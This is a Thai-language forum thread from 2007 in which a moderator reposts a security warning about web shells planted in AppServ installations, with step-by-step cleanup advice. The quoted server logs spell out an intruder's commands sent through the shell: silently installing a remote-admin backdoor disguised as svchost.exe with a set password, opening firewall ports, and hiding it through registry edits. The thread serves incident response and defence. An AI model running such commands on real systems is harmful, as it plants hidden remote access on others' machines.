Welcome, Guest. Please login or register.
Did you miss your activation email?


Login with username, password and session length

Search

 
Advanced search

28467 Posts in 7971 Topics- by 10279 Members - Latest Member: thamwebsite
บริษัท มาร์เวลิค เอ็นจิ้น จำกัด บริการอบรมหลักสูตรการสร้างเว็บไซต์ด้วย Mambo, Joomla และ WordPress ซึ่งประกอบไปด้วยหลักสูตรการใช้งานขั้นพื้นฐาน และการใช้งานขั้นสูง และหลักสูตรอื่นๆ ที่เกี่ยวข้อง อาทิ การสร้าง Template, การใช้งาน Component หรือ Extension, การใช้งาน VirtueMart, SMF
Opensource CMS Community ForumDevelopmentGeneral (Moderators: i_am_keng, goangle)appserv ระวัง!, มาอุดรูรั่วกัน
« previous next »
Pages: [1]   Go Down
Print
Author Topic: appserv ระวัง!, มาอุดรูรั่วกัน  (Read 5642 times)
goangle
Dev
Moderator
เทพแห่งบอร์ด
*

Karma: 1
Offline Offline

Posts: 1344


Teerapong S.

goangle@paradoxtech.cc
WWW
« on: July 31, 2007, 06:01:08 pm »
เห็นว่ามีสาระ เลยเอามาฝากกันครับ เก่าไปนิด เผื่อคนที่ยังไม่รู้
โดยคุณ : OctraDagostino Global Moderator Community Thaiware.com
---------------------------------
เพิ่มเจอมาสดสดร้อนร้อน (windows)

ถ้าคุณมีไฟล์นี้อยู่บนเซิรฟเวอร์

db.php หรือ db_view.php หรือ webadmin.php เป็นสคริปต์ที่ใช้เรียกดูและจัดการไดเรกทอรี ใดๆ บนเครื่อง เป็นสคริปต์ชื่อว่า webadmin.php
sys.php เป็นสคริปต์ที่เรียกใช้ command line (เปิดดูโค้ดจะเห็นชัด)

ซึ่งเป็นหนทางให้พวกลองของเข้ามารันโปรแกรมอะไรต่างๆ ได้อย่างอิสระ หรือแม้แต่ลงทะเบียนใน registry
ให้ลบทิ้งไปเลย

ในกรณีที่คุณไม่มีไฟล์เหล่านี้ คุณจะทำขั้นตอนต่อไปนี้ก็ได้ เพื่อไม่ให้ผู้อื่นมาอัพโหลดไฟล์ดังกล่าวเข้ามาวางไว้ได้

สร้าง .htacess สำหรับไดเรกทอรีนี้ (ถ้าคุณเป็นผู้ใช้มือใหม่ และไม่รู้จักด้วย ไม่ต้องทำตรงนี้ก็ได้)

จากนั้นให้สร้าง redirect page ไปที่ไหนก็ได้ และตั้งชื่อไฟล์เดียวกันนี้
ไปวางแทนที่ไฟล์เก่า แล้วกำหนดให้ไฟล์ดังกล่าวเป็น read only

แล้วคุณก็ตามไปดู server log ว่าไอพีที่น่าสงสัยเขาทำอะไรไว้ให้กับเครื่องคุณบ้าง คุณก็ตามแก้กลับ เท่านั้นเอง
นี่คือตัวอย่าง log ที่ผมจับมาได้ (และแก้กลับเรียบร้อยแล้ว)
ซึ่งจะเห็นได้ว่านอกจากมันจะเข้ามาแล้ว มันยังไปแก้ไฟร์วอลเพื่อให้ตัวเองสามารถใช้งานได้อย่างอิสระ
Quote
124.120.61.66 - - [11/Feb/2007:19:51:40 +0700]"GET /phpmyadmin/db_view.php HTTP/1.1" 200 110260
124.120.61.66 - - [11/Feb/2007:19:51:41 +0700] "GET /phpmyadmin/db_view.php?image=smiley HTTP/1.1" 200 104
124.120.61.66 - - [11/Feb/2007:19:51:41 +0700] "GET /phpmyadmin/db_view.php?image=folder HTTP/1.1" 200 102
124.120.61.66 - - [11/Feb/2007:19:51:41 +0700] "GET /phpmyadmin/db_view.php?image=file HTTP/1.1" 200 105
124.120.61.66 - - [11/Feb/2007:19:51:41 +0700] "GET /phpmyadmin/db_view.php?image=arrow HTTP/1.1" 200 82
124.120.61.66 - - [11/Feb/2007:19:52:05 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 111549
124.120.61.66 - - [11/Feb/2007:19:52:24 +0700] "GET /phpmyadmin/sys.php?cmd=ipconfig HTTP/1.1" 200 1115
124.120.61.66 - - [11/Feb/2007:19:53:20 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 29082
124.120.61.66 - - [11/Feb/2007:19:53:42 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 30393
124.120.61.66 - - [11/Feb/2007:19:54:01 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 31578
124.120.61.66 - - [11/Feb/2007:19:54:08 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 3255
124.120.61.66 - - [11/Feb/2007:19:54:15 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 31651
124.120.61.66 - - [11/Feb/2007:19:54:33 +0700] "GET /phpmyadmin/sys.php?cmd=C:\WINDOWS\system32\setup\svchost.exe%20/install%20/silence HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:19:54:46 +0700] "GET /phpmyadmin/sys.php?cmd=netsh%20firewall%20add%20allowedprogram%20C:\windows\system32\setup\svchost.exe%20systerm%20enable HTTP/1.1" 200 19
124.120.61.66 - - [11/Feb/2007:19:54:54 +0700] "GET /phpmyadmin/sys.php?cmd=netsh%20firewall%20add%20portopening%20TCP%2065074%20systerm HTTP/1.1" 200 19
124.120.61.66 - - [11/Feb/2007:19:55:03 +0700] "GET /phpmyadmin/sys.php?cmd=REG%20ADD%20HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters%20/v%20DisableTrayIcon%20/t%20REG_BINARY%20/d%2000000001%20/f HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:19:55:12 +0700] "GET /phpmyadmin/sys.php?cmd=REG%20ADD%20HKLM\SYSTEM\CurrentControlSet\Services\r_server%20/v%20DisplayName%20/t%20REG_SZ%20/d%20"Service%20Host%20Controller"%20/f HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:19:55:20 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/port:65074%20/pass:atom%20/save%20/silence HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:19:55:27 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:19:55:32 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/start HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:35 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:45 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:46 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:47 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:48 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:48 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:01:50 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:04:22 +0700] "GET /phpmyadmin/sys.php?cmd=viewp%20-l HTTP/1.1" 200 952
124.120.61.66 - - [11/Feb/2007:20:04:26 +0700] "POST /phpmyadmin/db_view.php HTTP/1.1" 200 112712
124.120.61.66 - - [11/Feb/2007:20:04:51 +0700] "GET /phpmyadmin/sys.php?cmd=C:\windows\system32\setup\svchost.exe%20/uninstall HTTP/1.1" 200 5
124.120.61.66 - - [11/Feb/2007:20:04:51 +0700] "GET /phpmyadmin/sys.php?cmd=viewp%20-k%202552 HTTP/1.1" 200 126
----------------------------------------
Quote
124.120.61.211 - - [12/Feb/2007:02:00:56 +0700] "GET /appserv/db.php?image=smiley HTTP/1.1" 200 104
124.120.61.211 - - [12/Feb/2007:02:00:56 +0700] "GET /appserv/db.php?image=file HTTP/1.1" 200 105
124.120.61.211 - - [12/Feb/2007:02:00:56 +0700] "GET /appserv/db.php?image=arrow HTTP/1.1" 200 82
124.120.61.211 - - [12/Feb/2007:02:00:59 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cappserv%5C.. HTTP/1.1" 200 32942
124.120.61.211 - - [12/Feb/2007:02:01:01 +0700] "GET /appserv/db.php?image=folder HTTP/1.1" 200 102
124.120.61.211 - - [12/Feb/2007:02:01:12 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cphpmyadmin HTTP/1.1" 200 112661
124.120.61.211 - - [12/Feb/2007:02:01:29 +0700] "GET /w/ HTTP/1.1" 302 5
124.120.61.211 - - [12/Feb/2007:02:01:32 +0700] "GET /w/home.php HTTP/1.1" 200 12914
124.120.61.211 - - [12/Feb/2007:02:01:32 +0700] "GET /w/style.css HTTP/1.1" 200 966
124.120.61.211 - - [12/Feb/2007:02:01:34 +0700] "GET /w/images/stm31.js HTTP/1.1" 200 36500
124.120.61.211 - - [12/Feb/2007:02:01:34 +0700] "GET /w/pngfix.js HTTP/1.1" 200 1573
124.120.61.211 - - [12/Feb/2007:02:01:43 +0700] "GET /w/images/newtitle_01.jpg HTTP/1.1" 200 20680
124.120.61.211 - - [12/Feb/2007:02:01:43 +0700] "GET /w/images/newtitle_02.jpg HTTP/1.1" 200 40680
124.120.61.211 - - [12/Feb/2007:02:01:44 +0700] "GET /w/menu.js HTTP/1.1" 200 4211
124.120.61.211 - - [12/Feb/2007:02:01:45 +0700] "GET /w/images/blank.gif HTTP/1.1" 200 49
124.120.61.211 - - [12/Feb/2007:02:01:45 +0700] "GET /w/images/arrow_gray.gif HTTP/1.1" 200 97
124.120.61.211 - - [12/Feb/2007:02:01:45 +0700] "GET /w/images/arrow_r.gif HTTP/1.1" 200 829
124.120.61.211 - - [12/Feb/2007:02:01:45 +0700] "GET /w/images/newtitle_03.jpg HTTP/1.1" 200 18890
124.120.61.211 - - [12/Feb/2007:02:01:46 +0700] "GET /w/images/newtitle_04.jpg HTTP/1.1" 200 8657
66.249.65.145 - - [12/Feb/2007:02:01:46 +0700] "GET /robots.txt HTTP/1.1" 200 28
124.120.61.211 - - [12/Feb/2007:02:01:46 +0700] "GET /w/images/newtitle_05.jpg HTTP/1.1" 200 3921
124.120.61.211 - - [12/Feb/2007:02:01:48 +0700] "GET /w/images/clock/blank.gif HTTP/1.1" 200 53
124.120.61.211 - - [12/Feb/2007:02:01:48 +0700] "GET /w/images/clock/colon.gif HTTP/1.1" 200 100
124.120.61.211 - - [12/Feb/2007:02:01:49 +0700] "GET /w/images/tiny.gif HTTP/1.1" 200 56
124.120.61.211 - - [12/Feb/2007:02:01:50 +0700] "GET /w/images/newtitle_06.jpg HTTP/1.1" 200 38423
124.120.61.211 - - [12/Feb/2007:02:01:50 +0700] "GET /w/images/bannersite/twwallbanner.gif HTTP/1.1" 200 2106
124.120.61.211 - - [12/Feb/2007:02:01:50 +0700] "GET /w/images/bannersite/thaidarksidelogo11.gif HTTP/1.1" 200 20603
124.120.61.211 - - [12/Feb/2007:02:01:51 +0700] "GET /w/images/bannersite/mybn.gif HTTP/1.1" 200 590
124.120.61.211 - - [12/Feb/2007:02:01:51 +0700] "GET /w/images/bannersite/neopets_88x31.gif HTTP/1.1" 200 5814
124.120.61.211 - - [12/Feb/2007:02:01:51 +0700] "GET /w/images/bannersite/giv_me.gif HTTP/1.1" 200 16285
124.120.61.211 - - [12/Feb/2007:02:01:52 +0700] "GET /w/images/bannersite/edu-club.gif HTTP/1.1" 200 2495
124.120.61.211 - - [12/Feb/2007:02:01:52 +0700] "GET /w/images/bannersite/poseidon.jpg HTTP/1.1" 200 3942
124.120.61.211 - - [12/Feb/2007:02:01:52 +0700] "GET /w/images/xhtml_icon.gif HTTP/1.1" 200 338
124.120.61.211 - - [12/Feb/2007:02:01:53 +0700] "GET /w/images/newtitle_07.jpg HTTP/1.1" 200 7216
124.120.61.211 - - [12/Feb/2007:02:01:55 +0700] "GET /w/data/event/2.png HTTP/1.1" 200 4775
124.120.61.211 - - [12/Feb/2007:02:01:56 +0700] "GET /w/data/event/1.png HTTP/1.1" 200 4712
124.120.61.211 - - [12/Feb/2007:02:01:57 +0700] "GET /w/images/newtitle_08.jpg HTTP/1.1" 200 36736
124.120.61.211 - - [12/Feb/2007:02:01:57 +0700] "GET /w/images/newtitle_09.jpg HTTP/1.1" 200 8627
124.120.61.211 - - [12/Feb/2007:02:01:57 +0700] "GET /w/images/newtitle_10.jpg HTTP/1.1" 200 4404
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/newtitle_11.jpg HTTP/1.1" 200 740
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/rss.gif HTTP/1.1" 200 597
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/spacer.gif HTTP/1.1" 200 43
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/clock/0.gif HTTP/1.1" 200 194
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/clock/2.gif HTTP/1.1" 200 173
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/clock/0.gif HTTP/1.1" 200 194
124.120.61.211 - - [12/Feb/2007:02:01:58 +0700] "GET /w/images/clock/0.gif HTTP/1.1" 200 194
124.120.61.211 - - [12/Feb/2007:02:02:11 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cphpmyadmin%5Clang HTTP/1.1" 200 138991
124.120.61.211 - - [12/Feb/2007:02:02:12 +0700] "GET /appserv/db.php?image=folder HTTP/1.1" 200 102
124.120.61.211 - - [12/Feb/2007:02:02:12 +0700] "GET /appserv/db.php?image=smiley HTTP/1.1" 200 104
124.120.61.211 - - [12/Feb/2007:02:02:12 +0700] "GET /appserv/db.php?image=file HTTP/1.1" 200 105
124.120.61.211 - - [12/Feb/2007:02:02:12 +0700] "GET /appserv/db.php?image=arrow HTTP/1.1" 200 82
124.120.61.211 - - [12/Feb/2007:02:02:25 +0700] "GET /w/images/arrow_r.gif HTTP/1.1" 304 -
124.120.61.211 - - [12/Feb/2007:02:02:25 +0700] "GET /w/images/arrow_gray.gif HTTP/1.1" 304 -
124.120.61.211 - - [12/Feb/2007:02:02:32 +0700] "GET /w/images/clock/1.gif HTTP/1.1" 200 152
124.120.61.211 - - [12/Feb/2007:02:02:45 +0700] "POST /appserv/db.php HTTP/1.1" 200 140369
124.120.61.211 - - [12/Feb/2007:02:02:59 +0700] "POST /appserv/db.php HTTP/1.1" 200 31151
124.120.61.211 - - [12/Feb/2007:02:03:14 +0700] "GET /appserv/db.php HTTP/1.1" 200 26335
124.120.61.211 - - [12/Feb/2007:02:03:18 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cappserv%5C.. HTTP/1.1" 200 32942
124.120.61.211 - - [12/Feb/2007:02:03:29 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cphpmyadmin HTTP/1.1" 200 112661
124.120.61.211 - - [12/Feb/2007:02:03:32 +0700] "GET /appserv/db.php?action=view&file=c%3A%5Cappserv%5Cwww%5Cphpmyadmin%5C_____sys.php HTTP/1.1" 200 3268
124.120.61.211 - - [12/Feb/2007:02:03:33 +0700] "GET /w/images/clock/2.gif HTTP/1.1" 304 -
124.120.61.211 - - [12/Feb/2007:02:03:53 +0700] "GET /phpmyadmin/_____sys.php?cmd=ipconfig HTTP/1.1" 200 1112
124.120.61.211 - - [12/Feb/2007:02:04:33 +0700] "GET /w/images/clock/3.gif HTTP/1.1" 200 174
124.120.61.211 - - [12/Feb/2007:02:04:43 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters%20/v%20DisableTrayIcon%20/t%20REG_BINARY%20/d%2000000001%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:04:52 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\CurrentControlSet\\Services\\r_server%20/v%20DisplayName%20/t%20REG_SZ%20/d%20\"Service%20Host%20Controller\"%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:05:03 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\WINDOWS\\system32\\setup\\svchost.exe%20/install%20/silence HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:05:13 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\windows\\system32\\setup\\svchost.exe%20/port:65074%20/pass:atom%20/save%20/silence HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:05:19 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\windows\\system32\\setup\\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:05:27 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\windows\\system32\\setup\\svchost.exe%20/start HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:05:32 +0700] "GET /w/images/clock/4.gif HTTP/1.1" 200 173
124.120.61.211 - - [12/Feb/2007:02:06:00 +0700] "GET /phpmyadmin/_____sys.php?cmd=netsh%20firewall%20add%20allowedprogram%20C:\\windows\\system32\\setup\\svchost.exe%20systerm%20enable HTTP/1.1" 200 19
124.120.61.211 - - [12/Feb/2007:02:06:06 +0700] "GET /phpmyadmin/_____sys.php?cmd=netsh%20firewall%20add%20portopening%20TCP%2065074%20systerm HTTP/1.1" 200 19
124.120.61.211 - - [12/Feb/2007:02:06:17 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\windows\\system32\\setup\\svchost.exe%20/stop HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:06:23 +0700] "GET /phpmyadmin/_____sys.php?cmd=C:\\windows\\system32\\setup\\svchost.exe%20/start HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:06:32 +0700] "GET /w/images/clock/5.gif HTTP/1.1" 200 176
124.120.61.211 - - [12/Feb/2007:02:07:13 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters%20/v%20DisableTrayIcon%20/t%20REG_BINARY%20/d%2000000001%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:07:14 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters%20/v%20DisableTrayIcon%20/t%20REG_BINARY%20/d%2000000001%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:07:14 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters%20/v%20DisableTrayIcon%20/t%20REG_BINARY%20/d%2000000001%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:07:27 +0700] "GET /phpmyadmin/_____sys.php?cmd=REG%20ADD%20HKLM\\SYSTEM\\CurrentControlSet\\Services\\r_server%20/v%20DisplayName%20/t%20REG_SZ%20/d%20\"Service%20Host%20Controller\"%20/f HTTP/1.1" 200 5
124.120.61.211 - - [12/Feb/2007:02:07:32 +0700] "GET /w/images/clock/6.gif HTTP/1.1" 200 191
124.120.61.211 - - [12/Feb/2007:02:08:32 +0700] "GET /w/images/clock/7.gif HTTP/1.1" 200 169
124.120.61.211 - - [12/Feb/2007:02:09:05 +0700] "GET /appserv/db.php HTTP/1.1" 200 26335
124.120.61.211 - - [12/Feb/2007:02:09:07 +0700] "GET /appserv/db.php?image=smiley HTTP/1.1" 200 104
124.120.61.211 - - [12/Feb/2007:02:09:07 +0700] "GET /appserv/db.php?image=folder HTTP/1.1" 200 102
124.120.61.211 - - [12/Feb/2007:02:09:07 +0700] "GET /appserv/db.php?image=file HTTP/1.1" 200 105
124.120.61.211 - - [12/Feb/2007:02:09:07 +0700] "GET /appserv/db.php?image=arrow HTTP/1.1" 200 82
124.120.61.211 - - [12/Feb/2007:02:09:12 +0700] "POST /appserv/db.php HTTP/1.1" 200 5906
124.120.61.211 - - [12/Feb/2007:02:09:16 +0700] "POST /appserv/db.php HTTP/1.1" 200 25371
124.120.61.211 - - [12/Feb/2007:02:09:20 +0700] "GET /appserv/db.php?dir=c%3A%5Cappserv%5Cwww%5Cappserv%5C.. HTTP/1.1" 404 286
124.120.61.211 - - [12/Feb/2007:02:09:22 +0700] "GET / HTTP/1.1" 304 -

----------------------------------
ต่อไปเราจะมาล้างโปรแกรมที่เกี่ยวข้องกัน

1. ก่อนอื่นไปตัดเน็ตก่อน แล้วสั่งคำสั่งนี้

net stop apache
net stop r_server
sc delete r_server

เพื่อหยุดการทำงานของ apache และถอน service แปลกปลอมออก

2. จากนั้นก็ให้ไปลบ registry ตามที่อยู่ดังนี้ให้หมด

HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/*
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/r_server/*

รวมทั้งตัว RAdmin กับ r_server เองด้วย

3. และสองไฟล์นี้ ถ้าอยู่ในไดเรกทอรีเดียวกัน ให้ลบออกไปทั้งคู่เลย ดูที่อยู่ของมันในรูป

svchost.exe หรือ dialer.exe (เป็นอักษรตัวเล็ก อย่าลบผิดละ)
AdmDll.dll (BKDR_DELODER.A)

ทิปในการค้นหา ลองเรียงลำดับไฟล์ตามวันที่จากมากไปน้อย จะพบว่าไฟล์มีวันที่เดียวกันเป๊ะ

4. ลบไฟล์ที่อยู่ใน /www/appserv/* รวมทั้งตัวโฟลเดอร์เองด้วย
ไม่ต้องเสียดายเพราะส่วนนี้ไม่ได้ใช้ประโยชน์อะไรอยู่แล้ว
ถ้าลบไม่ได้ ให้ log off รอบหนึ่ง แล้ว log in ใหม่ กลับมาลบมันใหม่

5. แล้วรีสตาร์ทเครื่องใหม่ น่าจะเสร็จแล้วละ

ขอขอบคุณ Community Thaiware.Com ครับผม  Smiley
« Last Edit: August 03, 2007, 12:57:56 am by goangle » Logged
Teerapong Singthong (goangle)
Moderator : Mambo.or.th
i_am_keng
สิ่งที่หาไม่ได้ง่าย ๆ คือโอกาสทองของชีวิต
Global Moderator
เทพแห่งบอร์ด
*

Karma: 3
Offline Offline

Posts: 865


sc450617@at_hotmail_dot_com.com
WWW
« Reply #1 on: July 31, 2007, 06:17:25 pm »
เจ๋งมากครับ Wink
Logged
www.cakephp.in.th
www.hotel-reservation.in.th

mambo laithai:www.mambohub.com
mambo dev:www.mambo-foundation.org
ywc#2
KConvert dev (convert character set)
www.keng-d.com
เที่ยวในไทย www.tour-in-thai.com
Keng:Suriya Kaewmungmuang
เก่ง:สุริยา แก้วมุงเมือง
avalance
เทพแห่งบอร์ด
*

Karma: 2
Offline Offline

Posts: 523


รับทำเว็บด้วยจูมล่านะครับ

pcnott@live.com
WWW
« Reply #2 on: August 02, 2007, 03:12:26 pm »
งงงงงงงงงงงงงงงงงงงงงงงงง  Huh
Logged
PCNOTT.COM บทความสอน Joomla ทำเว็บด้วยจูมล่า รับทำเว็บด้วย Joomla สอนจูมล่าตัวต่อตัว อบรมจูมล่านอกสถานที่ สอนการใช้ Joomla Download Extension , Component Module Plugin
aenoi
มือใหม่หัดโพส
*

Karma: 0
Offline Offline

Posts: 16
« Reply #3 on: August 02, 2007, 11:41:53 pm »
เยี่ยมเลยครับ แต่ผมไม่ได้ใช้ Appserv
Logged
goangle
Dev
Moderator
เทพแห่งบอร์ด
*

Karma: 1
Offline Offline

Posts: 1344


Teerapong S.

goangle@paradoxtech.cc
WWW
« Reply #4 on: August 03, 2007, 01:02:57 am »
เอาง่ายๆครับ เปรียบเทียบกับ Computer ที่เราใช้เลยดีกว่า ลักษณะการทำงาน เหมือนม้าโทรจัน (Trojan Horse) เหมือนในหนังเรื่อง Troy นั่นแหละครับ มันจะแผงตัวไปตามไฟล์ (แอบเนียน) มายังช่องทางต่างๆที่สามารถจัดการกับฮาร์ดแวร์คอมพิวเตอร์ของเราได้ พูดง่ายๆคือ แอบมาคนหมู่มากนั่นเอง

ซึ่งคนหมู่มาก หากเปรียบเทียบแล้วก็คือ Registry ที่มองดูผิวเผินก็ไม่น่ามีอะไร แต่ที่จิงแล้วร้ายกว่านั้น แฮคเกอร์ทั้งหลายก็ใช้โทรจันเองนี่แหละ เป็นช่องทางในการควบคุม กลั่นแกล้ง (ตามใจมันว่าง่ายๆ)

หากพูดถึง Appserv แล้ว Trojan Horse ก็คือ Files db.php หรือ db_view.php หรือ webadmin.php เป็นสคริปต์ที่ใช้เรียกดูและจัดการไดเรกทอรี ใดๆ บนเครื่อง เป็นสคริปต์ชื่อว่า webadmin.php
sys.php เป็นสคริปต์ที่เรียกใช้ command line (เปิดดูโค้ดจะเห็นชัด)

ซึ่งเป็นหนทางให้พวกลองของเข้ามารันโปรแกรมอะไรต่างๆ ได้อย่างอิสระ หรือแม้แต่ลงทะเบียนใน registry นั่นเองครับ
Logged
Teerapong Singthong (goangle)
Moderator : Mambo.or.th
Pages: [1]   Go Up
Print
« previous next »
Jump to: